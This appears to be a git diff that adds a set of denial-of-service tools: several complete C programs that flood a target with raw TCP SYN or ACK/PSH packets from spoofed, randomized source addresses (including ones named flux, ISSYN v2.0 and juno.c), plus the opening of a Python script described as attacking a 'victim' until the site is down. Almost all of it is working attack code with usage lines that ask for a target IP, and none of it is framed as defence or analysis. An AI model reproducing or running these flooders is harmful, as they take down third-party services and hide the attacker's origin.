strcat(a1s,".");
|
||||
strcat(a2s,".");
|
||||
strcat(a3s,".");
|
||||
strcat(a1s,a2s);
|
||||
strcat(a1s,a3s);
|
||||
strcat(a1s,a4s);
|
||||
//
|
||||
|
||||
synp.sport = htons(srcp); //source port [RANDOMIZED]
|
||||
synp.source = inet_addr (a1s); //our source address [RANDOMIZED]
|
||||
synp.seq = random();
|
||||
synp.ack_seq = random();
|
||||
|
||||
synp.id = htons(1+255*((random()%256)|0xFF)); //random id
|
||||
|
||||
synp.dest = inet_addr (argv[1]);
|
||||
|
||||
sin.sin_family = AF_INET; /*define internet domain*/
|
||||
sin.sin_port = synp.dport; /*define dest port.*/
|
||||
sin.sin_addr.s_addr = synp.dest; /*define host address*/
|
||||
|
||||
/*calc header checksum*/
|
||||
sum = (synp.source >> 16) + (synp.source & 0xffff) + (synp.dest >> 16) +
|
||||
(synp.dest & 0xffff) + 1536 + htons(count << 1);
|
||||
while(count--) sum += *p++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
synp.tcpsum = ~(sum += (sum >> 16));
|
||||
//
|
||||
|
||||
/*Send da baby*/
|
||||
if (sendto (sockd,&synp,sizeof(struct packet),0,(struct sockaddr *)&sin,sizeof(struct sockaddr_in)) < 0){
|
||||
printf("Sendto error!");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
counter = counter + 1;
|
||||
}
|
||||
}
|
||||
|
||||
/*usage func*/
|
||||
void usage(){
|
||||
printf("Usage:\n");
|
||||
printf("./flux ip port threads amount_of_packets(0 = max)\n");
|
||||
printf("./flux 111.222.333.444 80 3 500\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
/*user priv func, just checking for root.*/
|
||||
void getUserPriv(){
|
||||
char command[80] = "whoami > priv";
|
||||
char command2[80] = "rm priv";
|
||||
char fname[30] = "priv";
|
||||
char user[20];
|
||||
system(command);
|
||||
|
||||
fp = fopen(fname, "r");
|
||||
fscanf(fp, "%s",&user);
|
||||
fclose(fp);
|
||||
system(command2);
|
||||
|
||||
if (strcmp(user,"root") == 1){
|
||||
printf("Need root privelages to run...\n");
|
||||
exit(0);
|
||||
}
|
||||
}
|
||||
/*random port generator func. */
|
||||
int getSrcPort(){
|
||||
int port = (rand()%(60000-2000+1)) + 2000;
|
||||
return port;
|
||||
}
|
|
@ -0,0 +1,219 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = rand();
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = rand();
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->psh = 1;
|
||||
tcph->ack = 1;
|
||||
tcph->window = htons(1500);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
|
||||
tcph->dest = htons(floodport);
|
||||
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
|
||||
int num_threads = atoi(argv[3]);
|
||||
floodport = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
|
||||
int multiplier = 20;
|
||||
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,220 @@
|
|||
|
||||
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <time.h>
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
char ip[17];
|
||||
snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(rand()%54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = rand()%64;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr(ip);
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(rand()%65535);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 0;
|
||||
tcph->res1 = 0;
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->psh = 0;
|
||||
tcph->syn = 1;
|
||||
tcph->window = htons(65535);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->dest = htons(floodport);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
int psh = 0;
|
||||
int res1 = 0;
|
||||
int res2 = 0;
|
||||
while(1)
|
||||
{
|
||||
if(psh > 1) psh = 1;
|
||||
if(res1 > 4) res1 = 0;
|
||||
if(res2 > 3) res2 = 0;
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
tcph->dest = htons(rand()%65535);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->ack_seq = 1;
|
||||
tcph->psh = psh;
|
||||
tcph->res1 = res1;
|
||||
tcph->res2 = res2;
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
pps++;
|
||||
psh++;
|
||||
res1++;
|
||||
res2++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 5){
|
||||
fprintf(stdout, "ISSYN v2.0 - Improved by Spai3N\nInvalid parameters!\nUsage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(0));
|
||||
int num_threads = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[3]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
int multiplier = 20;
|
||||
int i;
|
||||
fprintf(stderr, "Start flooding ...\n", argv[1]);
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stderr, "Flooding: %s\n", argv[1]);
|
||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,294 @@
|
|||
char about[] = "juno.c\n";
|
||||
|
||||
/*
|
||||
for best results, compile with:
|
||||
gcc -O2 juno.c -o juno
|
||||
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netdb.h>
|
||||
#include <sys/time.h>
|
||||
#include <sys/types.h>
|
||||
#include <unistd.h>
|
||||
#include <stdlib.h>
|
||||
#include <signal.h>
|
||||
|
||||
#define USELESS_INFO
|
||||
#define EMULATE_WINDOWS /* EMULATE_WINDOWS or EMULATE_LINUX */
|
||||
#define RANDOMIZE_SOURCE_IP /* random source ips */
|
||||
#define RANDOMIZE_SOURCE_PORT /* random source ports */
|
||||
#undef DELAY 1000 /* microsecond delay, undef for none */
|
||||
|
||||
/* nothing beyond here is useful to people who can't program */
|
||||
|
||||
#ifndef EMULATE_WINDOWS
|
||||
# ifndef EMULATE_LINUX
|
||||
# define EMULATE_WINDOWS 1
|
||||
# endif
|
||||
#endif
|
||||
|
||||
struct syn {
|
||||
unsigned char verihl;
|
||||
unsigned char tos;
|
||||
unsigned short len;
|
||||
unsigned short id;
|
||||
unsigned short flg_ofs;
|
||||
unsigned char ttl;
|
||||
unsigned char proto;
|
||||
unsigned short ipsum;
|
||||
unsigned long src;
|
||||
unsigned long dst;
|
||||
unsigned short sport;
|
||||
unsigned short dport;
|
||||
unsigned long seq;
|
||||
unsigned long ack_seq;
|
||||
unsigned char offset;
|
||||
unsigned char flags;
|
||||
unsigned short win;
|
||||
unsigned short tcpsum;
|
||||
unsigned short urgptr;
|
||||
#ifdef EMULATE_WINDOWS
|
||||
char opt[8];
|
||||
#else
|
||||
# ifdef EMULATE_LINUX
|
||||
char opt[20];
|
||||
# endif
|
||||
#endif
|
||||
};
|
||||
|
||||
int resolve(char *name,unsigned long *ip) {
|
||||
struct hostent *host;
|
||||
|
||||
if ((*ip=inet_addr(name)) == INADDR_NONE) {
|
||||
if (!(host=gethostbyname(name))) return(-1);
|
||||
*ip=((struct in_addr *)host->h_addr)->s_addr;
|
||||
}
|
||||
return(0);
|
||||
}
|
||||
|
||||
int getsock(void) {
|
||||
int s = socket(PF_INET,SOCK_RAW,6),one=1;
|
||||
|
||||
if(s<1) return(0);
|
||||
if(setsockopt(s,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) return(0);
|
||||
return(s);
|
||||
}
|
||||
|
||||
int getport(char *s, unsigned short *out)
|
||||
{
|
||||
char const *p;
|
||||
int n;
|
||||
|
||||
if(!*s) return(-1);
|
||||
for (p=s;*p;p++) if(*p<'0'||*p>'9') return(-2);
|
||||
if(p-s>5) return(-3);
|
||||
if(((n=atoi(s))>65535) || (n<0)) return(4);
|
||||
*out=htons(n);
|
||||
return(0);
|
||||
}
|
||||
|
||||
void prep_syn(struct syn *syn) {
|
||||
syn->verihl = 69;
|
||||
syn->len = htons(sizeof(struct syn));
|
||||
syn->flg_ofs = 64;
|
||||
syn->proto = 6;
|
||||
syn->flags = 2;
|
||||
#ifdef EMULATE_WINDOWS
|
||||
syn->ttl = 128;
|
||||
syn->offset = 112;
|
||||
syn->win = htons(8192);
|
||||
syn->opt[0] = 2;
|
||||
syn->opt[1] = 4;
|
||||
syn->opt[2] = 5;
|
||||
syn->opt[3] = 0xB4;
|
||||
syn->opt[4] = 1;
|
||||
syn->opt[5] = 1;
|
||||
syn->opt[6] = 4;
|
||||
syn->opt[7] = 2;
|
||||
#else
|
||||
# ifdef EMULATE_LINUX
|
||||
syn->tos = 16;
|
||||
syn->ttl = 64;
|
||||
syn->offset = 160;
|
||||
syn->win = htons(15536);
|
||||
syn->opt[0] = 0x02;
|
||||
syn->opt[1] = 0x04;
|
||||
syn->opt[2] = 0x0F;
|
||||
syn->opt[3] = 0x2C;
|
||||
syn->opt[4] = 0x04;
|
||||
syn->opt[5] = 0x02;
|
||||
syn->opt[6] = 0x08;
|
||||
syn->opt[7] = 0x0A;
|
||||
syn->opt[9] = 0x05;
|
||||
syn->opt[10] = 0x27;
|
||||
syn->opt[11] = 0x2D;
|
||||
syn->opt[13] = 0x05;
|
||||
syn->opt[14] = 0x27;
|
||||
syn->opt[15] = 0x2D;
|
||||
syn->opt[16] = 0x01;
|
||||
syn->opt[17] = 0x03;
|
||||
syn->opt[18] = 0x03;
|
||||
# endif
|
||||
#endif
|
||||
}
|
||||
|
||||
int starttime,outcount=0;
|
||||
|
||||
int xmit_syn(struct syn *syn,int sock,struct sockaddr_in *targ) {
|
||||
register int count = (sizeof(struct syn)-20) >> 1,sum;
|
||||
register unsigned short *p = &syn->sport;
|
||||
|
||||
#ifdef RANDOMIZE_SOURCE_IP
|
||||
syn->src = random();
|
||||
#endif
|
||||
syn->id = 1+255*((random()%256)|0xFF);
|
||||
#ifdef RANDOMIZE_SOURCE_PORT
|
||||
syn->sport = htons(1024 + (random() & 2048));
|
||||
#endif
|
||||
syn->seq = random();
|
||||
syn->ack_seq = random();
|
||||
syn->tcpsum = 0;
|
||||
sum = (syn->src >> 16) + (syn->src & 0xffff) + (syn->dst >> 16) +
|
||||
(syn->dst & 0xffff) + 1536 + htons(count << 1);
|
||||
while(count--) sum += *p++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
syn->tcpsum = ~(sum += (sum >> 16));
|
||||
|
||||
outcount++;
|
||||
|
||||
return(sendto(sock,syn,sizeof(struct syn),0,targ,sizeof(struct sockaddr_in)));
|
||||
}
|
||||
|
||||
#ifdef RANDOMIZE_SOURCE_IP
|
||||
# ifdef RANDOMIZE_SOURCE_PORT
|
||||
# define TARGET_IP_INDEX 1
|
||||
# else
|
||||
# define SOURCE_PORT_INDEX 1
|
||||
# define TARGET_IP_INDEX 2
|
||||
# endif
|
||||
#else
|
||||
# ifdef RANDOMIZE_SOURCE_PORT
|
||||
# define TARGET_IP_INDEX 2
|
||||
# else
|
||||
# define SOURCE_PORT_INDEX 2
|
||||
# define TARGET_IP_INDEX 3
|
||||
# endif
|
||||
#endif
|
||||
|
||||
void sig_proc(int signum) {
|
||||
int ctime=time(NULL);
|
||||
printf("\n -- statistics -----------------------\n");
|
||||
printf(" packets sent: %d\n",outcount);
|
||||
printf(" bytes sent: %d\n",outcount * sizeof(struct syn));
|
||||
printf(" seconds active: %d\n",ctime-starttime);
|
||||
printf(" average bytes/second: %d\n",(outcount * sizeof(struct syn))/(ctime-starttime));
|
||||
printf(" -------------------------------------\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
int main(int argc,char *argv[]) {
|
||||
struct syn syn;
|
||||
struct sockaddr_in targ;
|
||||
int sock;
|
||||
|
||||
bzero(&syn,sizeof(struct syn));
|
||||
|
||||
if(argc<TARGET_IP_INDEX+2) {
|
||||
fprintf(stderr,"Syntax: %s ",argv[0]);
|
||||
#ifndef RANDOMIZE_SOURCE_IP
|
||||
fprintf(stderr,"<source ip> ");
|
||||
#endif
|
||||
#ifndef RANDOMIZE_SOURCE_PORT
|
||||
fprintf(stderr,"<source port> ");
|
||||
#endif
|
||||
fprintf(stderr,"<target ip> <target port>\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if(!(sock=getsock())) {
|
||||
fprintf(stderr,"Failed to create socket\n");
|
||||
exit(2);
|
||||
}
|
||||
|
||||
#ifndef RANDOMIZE_SOURCE_IP
|
||||
if(resolve(argv[1],&syn.src)) {
|
||||
fprintf(stderr,"Invalid source ip (%s)\n",argv[1]);
|
||||
exit(3);
|
||||
}
|
||||
#endif
|
||||
|
||||
#ifndef RANDOMIZE_SOURCE_PORT
|
||||
if(getport(argv[SOURCE_PORT_INDEX],&syn.sport)) {
|
||||
fprintf(stderr,"Invalid source port (%s)\n",argv[SOURCE_PORT_INDEX]);
|
||||
exit(4);
|
||||
}
|
||||
#endif
|
||||
|
||||
if(resolve(argv[TARGET_IP_INDEX],&syn.dst)) {
|
||||
fprintf(stderr,"Invalid target ip (%s)\n",argv[TARGET_IP_INDEX]);
|
||||
exit(5);
|
||||
}
|
||||
|
||||
if(getport(argv[TARGET_IP_INDEX+1],&syn.dport)) {
|
||||
fprintf(stderr,"Invalid target port (%s)\n",argv[TARGET_IP_INDEX+1]);
|
||||
exit(6);
|
||||
}
|
||||
|
||||
#ifdef USELESS_INFO
|
||||
printf("%s%s",about,"death");
|
||||
# ifndef RANDOMIZE_SOURCE_IP
|
||||
printf(" from %s:",inet_ntoa(syn.src));
|
||||
# ifndef RANDOMIZE_SOURCE_PORT
|
||||
printf("%d",ntohs(syn.sport));
|
||||
# else
|
||||
printf("random ");
|
||||
# endif
|
||||
# else
|
||||
# ifndef RANDOMIZE_SOURCE_PORT
|
||||
printf("random:%d",ntohs(syn.sport));
|
||||
# endif
|
||||
# endif
|
||||
printf(" to %s:%d\n",inet_ntoa(syn.dst),ntohs(syn.dport));
|
||||
#endif
|
||||
targ.sin_addr.s_addr = syn.dst;
|
||||
targ.sin_port = syn.dport;
|
||||
targ.sin_family = AF_INET;
|
||||
|
||||
srandom(time(NULL));
|
||||
|
||||
starttime = time(NULL);
|
||||
while(time(NULL) == starttime) usleep(1000);
|
||||
|
||||
signal(SIGHUP,&sig_proc);
|
||||
signal(SIGINT,&sig_proc);
|
||||
signal(SIGQUIT,&sig_proc);
|
||||
signal(SIGILL,&sig_proc);
|
||||
signal(SIGABRT,&sig_proc);
|
||||
signal(SIGFPE,&sig_proc);
|
||||
// signal(SIGKILL,&sig_proc);
|
||||
signal(SIGSEGV,&sig_proc);
|
||||
signal(SIGPIPE,&sig_proc);
|
||||
signal(SIGALRM,&sig_proc);
|
||||
signal(SIGTERM,&sig_proc);
|
||||
signal(SIGUSR1,&sig_proc);
|
||||
signal(SIGUSR2,&sig_proc);
|
||||
signal(SIGCHLD,&sig_proc);
|
||||
signal(SIGCONT,&sig_proc);
|
||||
// signal(SIGSTOP,&sig_proc);
|
||||
signal(SIGTSTP,&sig_proc);
|
||||
signal(SIGTTIN,&sig_proc);
|
||||
signal(SIGTTOU,&sig_proc);
|
||||
|
||||
prep_syn(&syn);
|
||||
while(1) {
|
||||
if(xmit_syn(&syn,sock,&targ)!=sizeof(struct syn)) {
|
||||
fprintf(stderr,"failed to send packet\n");
|
||||
exit(7);
|
||||
}
|
||||
#ifdef DELAY
|
||||
usleep(DELAY);
|
||||
#endif
|
||||
}
|
||||
}
|
|
@ -0,0 +1,147 @@
|
|||
#!/usr/bin/env python
|
||||
import socket
|
||||
from time import sleep
|
||||
from threading import Thread, active_count
|
||||
from os import system, geteuid
|
||||
import random
|
||||
import string
|
||||
import signal
|
||||
import ssl
|
||||
import argparse
|
||||
import sys
|
||||
|
||||
example_text = ''' \nTips: Target page with 1500+ bytes size.
|
||||
|
||||
example:
|
||||
python %s example.com/test.php -p 80 -http
|
||||
python %s example.com/hello/ -p 443 -ssl -http
|
||||
python %s example.com -p 80 -http
|
||||
python %s example.com -p 21 -payload 68656c6c6f
|
||||
python %s example.com -p 22
|
||||
|
||||
Connects - TCP handshakes towards victim
|
||||
Payloads - Recevied payloads by victim
|
||||
Dropped - TCP handshakes or payloads rejected by victim (site down)
|
||||
|
||||
''' % (sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0])
|
||||
|
||||
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawTextHelpFormatter)
|
||||
parser._action_groups.pop()
|
||||
required = parser.add_argument_group('required arguments')
|
||||
optional = parser.add_argument_group('optional arguments')
|
||||
|
||||
required.add_argument('target', help='Specify a target to attack')
|
||||
required.add_argument('-p', dest='port', help='Specify port to attack', type=int, required=True)
|
||||
|
||||
